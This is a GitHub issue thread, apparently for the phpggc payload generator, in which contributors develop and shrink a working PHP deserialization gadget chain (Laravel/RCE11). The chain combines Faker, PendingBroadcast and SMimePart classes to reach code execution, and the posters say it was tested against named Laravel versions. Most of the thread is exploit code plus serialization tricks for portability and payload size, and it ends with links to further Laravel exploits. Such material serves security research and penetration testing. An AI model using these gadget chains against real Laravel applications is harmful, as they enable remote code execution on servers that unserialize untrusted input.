New pop chains for Laravel 9.12.2 #118
Comments
Looks like the original author has submitted a PR in #119 |
Hello GlitchWitch, Added the one you referenced. @1nhann, any plans to push the three others? Charles |
Hello @cfreal, |
Hello, A quick solution for that could be to use the Tested and worked. (As Laravel/RCE11) Good luck. |
Thanks, added. #126 |
Hi everybody, I finally had the time to process this ticket. Cool idea.

```php
class X {
    public $a;
    public $b;
    function __construct()
    {
        $this->a = 3;
        $this->b = &$this->a;
    }
}
print serialize(new X());
# O:1:"X":2:{s:1:"a";i:3;s:1:"b";R:2;}
```

This is even more portable because we can now integrate the gadgetchain in a bigger payload, and the reference number will still be correct. I will update the submitted Laravel/RCE11 GC to reflect this! Charles |
Hello, Thanks @cfreal, I tried to use references weeks ago, but I failed because of a mistake in my code. I updated the rest of the code with your gadget. I can provide some suggestions: Abstraction has no effect in the serialization process, so we can remove it, and this will allow us to instantiate the "AbstractPart" class and to use its constructor, and we will not need to define a new method ("createBroadcast"). I mean:

gadget.php

```php
<?php
namespace Faker
{
    class Generator
    {
        protected $providers = [];
        protected $formatters = [];
        function __construct(&$formatters)
        {
            $this->formatter = "dispatch";
            $this->formatters = &$formatters;
        }
    }
}
namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        public function __construct(&$formatters, $parameter)
        {
            $this->event = $parameter;
            $this->events = new \Faker\Generator($formatters);
        }
    }
}
namespace Symfony\Component\Mime\Part
{
    class AbstractPart
    {
        private $headers = null;
        public function __construct($parameter)
        {
            return new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
        }
    }
    class SMimePart extends AbstractPart
    {
        protected $_headers;
        public $inhann;
        function __construct($function, $parameter)
        {
            $this->_headers = ["dispatch" => $function];
            $this->inhann = parent::__construct($parameter);
        }
    }
}
```

Or even better (by removing the "AbstractPart" class and using the "$headers" property in the "SMimePart" class. This one generates ~16% smaller payloads. Tested and worked on v9.3.8, v9.35.1.):

```php
<?php
namespace Faker
{
    class Generator
    {
        protected $formatters = [];
        function __construct(&$formatters)
        {
            $this->formatters = &$formatters;
        }
    }
}
namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        public function __construct(&$formatters, $parameter)
        {
            $this->event = $parameter;
            $this->events = new \Faker\Generator($formatters);
        }
    }
}
namespace Symfony\Component\Mime\Part
{
    class SMimePart
    {
        protected $_headers;
        public $inhann;
        private $headers = null;
        function __construct($function, $parameter)
        {
            $this->_headers = ["dispatch" => $function];
            $this->inhann = new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
        }
    }
}
```

Thank you. |
Hello @mir-hossein, although I like the idea of reducing payload size, your second statement is incorrect.

```php
<?php
class A {
    private $x = 3;
    function __construct($x) {
        $this->x = $x;
    }
    public function display() {
        print "x is $this->x\n";
    }
}
class B extends A {
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
$u = unserialize($z);
$u->display();
```

Let's run this with different PHP versions:
|
Hello @cfreal, Thanks for your explanation. Sorry, I had tested it only in PHP 8.1, Laravel 9.3.8, Framework 9.35.1. You are right.

lol2.php

```php
<?php
class A {
    private $x = 3;
    function __construct($x) {
        $this->x = $x;
    }
    public function display() {
        print "x is $this->x\n";
    }
}
class B extends A {
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
var_dump(unserialize($z));
```

Results:
I didn't test the Object deserialization result in older PHP versions.

lol3.php

```php
<?php
class A
{
    private $x = 3;
    public function display()
    {
        print "x is $this->x\n";
    }
}
class B extends A
{
    public function __construct($x)
    {
        $this->x = $x;
    }
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
var_dump(unserialize($z));
```

Results:

Only works in PHP 8.1. :( New suggestion: this one generates ~15% smaller payloads :)

gadget.php

```php
<?php
namespace Faker
{
    class Generator
    {
        protected $formatters = [];
        function __construct(&$formatters)
        {
            $this->formatters = &$formatters;
        }
    }
}
namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        public function __construct(&$formatters, $parameter)
        {
            $this->event = $parameter;
            $this->events = new \Faker\Generator($formatters);
        }
    }
}
namespace Symfony\Component\Mime\Part
{
    class AbstractPart
    {
        private $headers = null;
        public function __construct($parameter)
        {
            return new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
        }
    }
    class SMimePart extends AbstractPart
    {
        protected $_headers;
        public $inhann;
        function __construct($function, $parameter)
        {
            $this->_headers = ["dispatch" => $function];
            $this->inhann = parent::__construct($parameter);
        }
    }
}
```

Tested: PHP: 7.4.32, Laravel: 8.6.12, Framework: 8.83.25 |
I am considering making it an option at some point in the future: make every property public to save space and to get rid of null bytes (even though we could use |
Excellent idea👍. Every time I talk to you, I learn something new. Thanks @cfreal. |
Let's close this (for now). |
Looks like someone published 4 new exploits for Laravel via an unserialize pop chain in `__destruct` and `dispatch($command)`. I tested them and confirmed they work. Source:

1nhann/vulns#1
1nhann/vulns#2
1nhann/vulns#3
1nhann/vulns#4

Posting here since this may be of interest to implement into phpggc